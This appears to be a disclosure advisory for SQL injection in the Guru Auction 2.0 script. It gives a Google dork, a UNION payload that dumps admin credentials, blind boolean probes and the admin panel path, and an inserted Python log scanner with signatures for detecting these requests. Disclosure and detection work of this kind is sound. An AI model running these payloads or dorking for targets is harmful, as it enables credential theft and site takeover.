Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
Author : v3n0m
Application : Guru Auction 2.0
Price : $49
Vendor : http://www.guruscript.com/
Google Dork : inurl:subcat.php?cate_id=
SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
Blind SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
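As an added example (not part of the original advisory and not Guru Auction's own code), the following Python script shows how a defender would flag the two request shapes above in web server access logs: the UNION-based extraction against subcat.php?cate_id and the boolean-based true/false probe against detail.php?item_id. The log lines are constructed to look like Apache combined-format entries; the parameter watch list and the signature regexes are my assumptions, not anything shipped with the product.

```python
"""Flag the SQL injection probe shapes from the advisory in web access logs.

Added example, not part of the original advisory or of Guru Auction itself.
SAMPLE_LOG is constructed: the request paths reuse the advisory's PoC shapes
(with domain.tld replaced by a path under a hypothetical /shop/ install)
mixed with benign traffic.
"""
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Detection signatures applied to each URL-decoded query parameter value.
# Labels and patterns are assumptions for this example, not a vendor ruleset.
SIGNATURES = [
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("schema-exfil", re.compile(r"\b(group_concat|information_schema|from\s+admin)\b", re.I)),
    ("boolean-probe", re.compile(r"\b(and|or)\b\s+[\w@(]+.*?[=<>]", re.I)),
    ("version-probe", re.compile(r"@@version|version\(\)", re.I)),
    ("sql-comment", re.compile(r"(--|#|/\*)\s*$")),
]

# Parameters the advisory names as injectable; an id that is not a plain
# integer on one of these is suspicious on its own (hypothetical watch list).
WATCHED_PARAMS = {"cate_id", "item_id"}

# Apache combined log prefix: client, identd, user, timestamp, request, status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /shop/subcat.php?cate_id=12 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /shop/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin-- HTTP/1.1" 200 5300',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /shop/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 HTTP/1.1" 200 4100',
    '198.51.100.7 - - [10/Oct/2023:13:56:02 +0000] "GET /shop/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 HTTP/1.1" 200 2900',
    '192.0.2.9 - - [10/Oct/2023:13:57:10 +0000] "GET /shop/detail.php?item_id=575 HTTP/1.1" 200 4100',
]


def classify_request(path):
    """Return the set of signature labels matching any query parameter of `path`."""
    query = urlsplit(path).query
    hits = set()
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl already decodes once; decoding again catches double-encoded payloads
        decoded = unquote_plus(value)
        for label, rx in SIGNATURES:
            if rx.search(decoded):
                hits.add(label)
        if name in WATCHED_PARAMS and not re.fullmatch(r"-?\d+", decoded.strip()):
            hits.add("non-numeric-id")
    return hits


def scan_log(lines):
    """Return [(client_ip, request_path, sorted_labels)] for every matching line."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not combined-format requests
        labels = classify_request(m.group("path"))
        if labels:
            findings.append((m.group("ip"), m.group("path"), sorted(labels)))
    return findings


if __name__ == "__main__":
    for ip, path, labels in scan_log(SAMPLE_LOG):
        print(f"{ip}  {', '.join(labels)}\n    {path}")
```

The two detail.php hits from the same client, seconds apart, on the same item_id with different response sizes are the characteristic footprint of the blind technique shown above: the injected comparison flips the page between its "true" and "false" rendering. The non-numeric-id check mirrors the root fix on the application side, which is to cast cate_id and item_id to integers (or bind them as parameters in a prepared statement) before they reach the query.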
Admin login panel:
~~~~~~~~~~
http://domain.tld/[path]/admin/